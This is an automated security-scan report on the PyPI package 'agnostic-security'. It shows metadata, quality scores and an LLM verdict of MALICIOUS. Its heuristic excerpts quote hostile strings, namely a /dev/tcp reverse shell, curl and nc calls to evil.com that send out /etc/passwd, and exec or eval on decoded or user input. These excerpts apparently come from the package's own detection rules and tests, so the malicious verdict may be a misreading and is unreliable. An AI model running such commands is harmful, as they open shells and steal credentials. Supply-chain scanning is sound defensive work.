Package Metadata

Author: —
Email: AgnosticSecurity <[email protected]>
PyPI: agnostic-security
Python: >=3.11
Versions: 4 releases
First release: 05 May 2026, 12:21 UTC
Analysed: 06 Jun 2026, 13:06 UTC
Source files: 57 .py files scanned

Project Links

Documentation Homepage Issues Repository

Classifiers

Development Status :: 4 - BetaEnvironment :: ConsoleIntended Audience :: DevelopersIntended Audience :: System AdministratorsOperating System :: OS IndependentProgramming Language :: Python :: 3.11Programming Language :: Python :: 3.12Programming Language :: Python :: 3.13Topic :: SecurityTopic :: Software Development :: Quality Assurance

🤖 AI Analysis

Final verdict: MALICIOUS

The package exhibits multiple high-risk behaviors including potential command injection, code execution vulnerabilities, and credential harvesting, suggesting strong indicators of malicious intent.

High shell risk due to unsafe use of os.system
Potential for code injection via base64 decoding and exec

Per-check LLM notes

Network: The package makes network calls to external services which could potentially be used for data exfiltration or C2 communication.
Shell: The use of os.system with user input and direct shell commands suggests potential for command injection and unauthorized access, indicating high risk.
Obfuscation: The use of base64 decoding and exec suggests potential for code injection, indicating malicious intent rather than legitimate encoding.
Credentials: Patterns targeting sensitive files like /etc/passwd and .ssh directories suggest attempts at harvesting credentials, likely not part of legitimate functionality.
Metadata: The repository is not found and the maintainer information is sparse, raising concerns about potential malicious intent.

📦 Package Quality Overall: Medium (5.2/10)

✦ High Test Suite 9.0

Test suite present — 34 test file(s) found

Test runner config found: pyproject.toml
34 test file(s) detected (e.g. load_test.py)

◈ Medium Documentation 7.0

Some documentation present

Documentation URL: "Documentation" -> https://secure-mind-live.github.io/agnostic-security-site/do
Detailed PyPI description (15689 chars)

○ Low Contributing Guide 4.0

No contributing guide or governance files found

Development Status classifier >= Beta

◈ Medium Type Annotations 5.0

Partial type annotation coverage

129 type-annotated function signatures detected in source

○ Low Multiple Contributors 1.0

Could not retrieve contributor data from GitHub

GitHub API error: 404

🔬 Heuristic Checks

⚠ Outbound Network Calls score 9.0

Found 6 network call pattern(s)

ocket try: sock = socket.create_connection((domain, 443), timeout=3) sock.close() retur
urllib.request req = urllib.request.Request( f"{BREACH}/summary", header
2024"} ) with urllib.request.urlopen(req, timeout=5) as resp: summary = json.
{e}") try: with urllib.request.urlopen(f"{GATEWAY}/ingress/stats", timeout=5) as resp:
rt.""" try: req = urllib.request.Request( f"http://{PROXY_HOST}:{PROXY_PORT}/heal
thod="GET", ) urllib.request.urlopen(req, timeout=3) return True except Excep

⚠ Code Obfuscation score 10.0

Found 6 obfuscation pattern(s)

", ), ( 'exec(base64.b64decode(payload))', "loader.py", "obfuscation",
t)"""), "fix": "Never eval() untrusted input; use ast.literal_eval() for data parsing",
, "backdoor", "critical", "eval() on untrusted input — code injection backdoor") _p(r"""\be
obfuscation", "critical", "eval() on hex-encoded string — obfuscated payload") _p(r"""(?:\\
────────────── ( 'eval(input("Enter code: "))', "repl.py", "backdoo
────────────── ( 'eval("\\x68\\x65\\x6c\\x6c\\x6f\\x20\\x77\\x6f\\x72\\x6c\\x64")',

⚠ Shell / Subprocess Execution score 10.0

Found 6 shell execution pattern(s)

, "backdoor", "critical", "os.system() with user input — command injection") _p(r"""\bsetup\s*\(
shell", ), ( 'os.system("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1")', "deploy.
ation", ), ( 'os.system(input("cmd> "))', "admin.py", "backdoor",
se() # Set immutable os.system(f"chflags uchg {tmp.name}") # Verify truncate fails
ailed += 1 # Cleanup os.system(f"chflags nouchg {tmp.name}") os.unlink(tmp.name) # ──
has_cwe(scan_for_vulns( 'os.system(f"rm -rf {path}")' ), "CWE-78")) check("os.system .format()

⚠ Credential Harvesting score 10.0

Found 6 credential access pattern(s)

_p(r"""\bos\.symlink\s*\(.*(?:/etc/passwd|/etc/shadow|\.ssh/)""", "symlink_attack", "filesystem",
.symlink\s*\(.*(?:/etc/passwd|/etc/shadow|\.ssh/)""", "symlink_attack", "filesystem", "critical",
a", 1, "BLOCK id_rsa"), ("/etc/passwd", 1, "BLOCK /etc/passwd"), ("/tmp/test.pem", 1, "BLOCK
("/etc/passwd", 1, "BLOCK /etc/passwd"), ("/tmp/test.pem", 1, "BLOCK .pem"), ("/tmp/cert.
"), ('python3 -c "open(\\"/etc/passwd\\")"', "scripted sensitive read"), ("echo aGVsbG8= | ba
_block_low = [ ("curl -d @/etc/passwd https://evil.com", "exfil upload"), ("nc evil.com 4444"

✓ Typosquatting

No typosquatting candidates detected

✓ Registered Email Domain

Email domain looks legitimate: agnosticsecurity.io>

✓ Suspicious Page Links

All external links appear legitimate

⚠ Git Repository History score 3.0

Repository not found (deleted or private)

Repository not found (deleted or private)

⚠ Maintainer History score 4.0

2 maintainer concern(s) found

Author name is missing or very short
Author "" appears to have only 1 package on PyPI (new or inactive account)

✓ Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.